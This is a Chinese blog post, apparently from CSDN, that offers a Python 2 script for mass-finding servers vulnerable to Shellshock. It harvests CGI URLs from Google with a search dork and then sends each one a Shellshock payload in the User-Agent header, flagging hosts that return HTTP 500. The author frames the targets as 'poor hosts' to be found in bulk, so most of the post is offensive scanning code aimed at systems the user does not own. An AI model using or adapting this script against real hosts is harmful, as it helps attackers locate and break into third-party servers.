Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本

Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题。
其中最最简单的方法就是使用搜索引擎的hacking技术,这里我使用的Google Hacking语法结合Google API来进行链接的抓取。只不过在国内的话。。。。需要加代理。
程序中的代理是我本地的goagent代理,端口是8087。如何检测漏洞思路也很简单,我这里直接根据服务器返回码进行判断的。

思路就是以上这些,下面还是和往常一样,贴代码:

 

#coding=utf-8
import requests
import json
import sys
import threading
import socket
vul_res = []
class GoogleURLProvider():
	def __init__(self,pageCount,proxies):
		self.pageCount = pageCount #查询的页数
		self.keywords = r'inurl:cgi-bin filetype:sh'
		self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"
		self.proxies = proxies
	def getRequest(self,url):
		return requests.get(url,proxies=self.proxies,verify=False)

	def getUrls(self):
		ret_list = []
		tmp_list = []
		for x in xrange(0,self.pageCount):
			url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)
			try:
				r = self.getRequest(url)	
				results = json.loads(r.text)
				if not results:
					continue
				infos = results['responseData']['results']
				if infos:
					for i in infos:
						tmp_list.append(i['url'])
			except Exception, e:
				continue
		ret_list = ret_list + tmp_list
		return ret_list

class BashRCEDetector():
	def __init__(self,urls):

		self.urls = urls
	def detector(self):
		global vul_res
		
		for x in self.urls:
			#多线程执行
			each = EachWorker(x)
			each.start()
			each.join()


'''线程工作类'''
class EachWorker(threading.Thread):
	def __init__(self,url):
		threading.Thread.__init__(self)
		self.url = url
	def run(self):
		global vul_res
		useragent_header = {
			'User-Agent':'''() { 1;}; echo 'eee'''
		}
		try:
			r = requests.get(self.url,headers = useragent_header,timeout=8)
			if r.status_code == 500:
				print "{url} has Bash RCE vulnerability".format(url=self.url)
				vul_res.append(self.url)
			else:
				pass
		except socket.timeout, e:
			pass
		except requests.exceptions.Timeout, e:
			pass
		except requests.exceptions.ConnectionError, e:
			pass


if __name__ == '__main__':
	print 'Powered by:Exploit QQ:739858341'
	print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'
	if len(sys.argv) != 2:
		print 'Usage:python BashRCEScanner <google pageCount>'
		sys.exit()
	#goagent proxy
	#在这里修改,加入你自己的代理即可使用
	proxies = {
	'http':"http://127.0.0.1:8087",
	'https':"http://127.0.0.1:8087"
	}
	url_res = []
	vul_guys = []
	urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)
	url_res = urlgetter.getUrls()

	bash_detector = BashRCEDetector(url_res)
	bash_detector.detector()
	if len(vul_res) == 0:
		print 'This group have no vulnerability'
	else:
		print 'Find %d poor host(s)' % len(vul_res) 

 

 

 

 

 

运行截图:

 

 

©️2020 CSDN 皮肤主题: 技术黑板 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值